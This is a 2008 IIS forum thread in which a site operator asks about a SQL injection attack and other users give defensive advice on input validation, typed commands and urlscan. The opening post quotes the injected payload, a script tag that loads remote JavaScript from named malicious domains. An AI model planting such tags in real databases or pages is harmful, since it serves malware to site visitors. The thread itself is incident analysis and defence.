Previous Next

• 08-15-2008, 11:55 AM

  KentZhou Joined on 05-03-2006, 3:48 PM Posts 30

  SQL Injection attack issue Reply Contact SQL Injection attacked so many sites these days. After analyzing the attacking, I got a very strange case. The attacking url including a script trying to add following string to varchar columns in database: ></title><script src="http://jjmaoduo2.3322.org/csrss/w.js"></script><!-- It was captured by log. But in database, the data was changed by following string and only to those columns including some special keywords like url, publish, image, etc:  ></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!-- A little different with the malicious site name.So I guest maybe there was some other thing hidden with this attack. but can't figure it out.  Another question is: there is no file was changed on server site. How was this injection added to some url? where is the source of attacking? On the fly? From client computer? Any idea?

• 08-15-2008, 12:27 PM

  In reply to

  Rovastar Joined on 03-13-2008, 10:00 AM London, UK Posts 758	Re: SQL Injection attack issue Reply Contact It looks similiar to this attack from a few months ago http://forums.iis.net/t/1148917.aspx Most overused word in IT is 'should' as in 'That should work!?!'

• 08-15-2008, 2:17 PM

  In reply to

  KentZhou Joined on 05-03-2006, 3:48 PM Posts 30	Re: SQL Injection attack issue Reply Contact  Yes, but I want to know the reason for this speficic case. Injection script said it adds string A to your data, but you get string B in your data invasion. Don't understand. Maybe there is something potenial danger included in the process of the attacking.

• 08-17-2008, 3:35 PM

  In reply to

  Rusty Davis Joined on 08-17-2008, 6:19 PM Posts 8	Re: SQL Injection attack issue Reply Contact Rule #1 always check the validity of the data before attempting to run against a database. Rule #2 command object catches these issues Rule #3 cast everything to the type expected

• 08-17-2008, 10:17 PM

  In reply to

  steve schofield Joined on 06-10-2002, 4:54 PM MI Posts 2,581	Re: SQL Injection attack issue Reply Contact urlscan 3.0 can help in the short-term to block sql injections, but most likely legit requests would be impacted.  Fixing / coding for it is the best option. Steve Schofield Windows Server MVP - IIS http://weblogs.asp.net/steveschofield http://www.IISLogs.com Log archival solution Install, Configure, Forget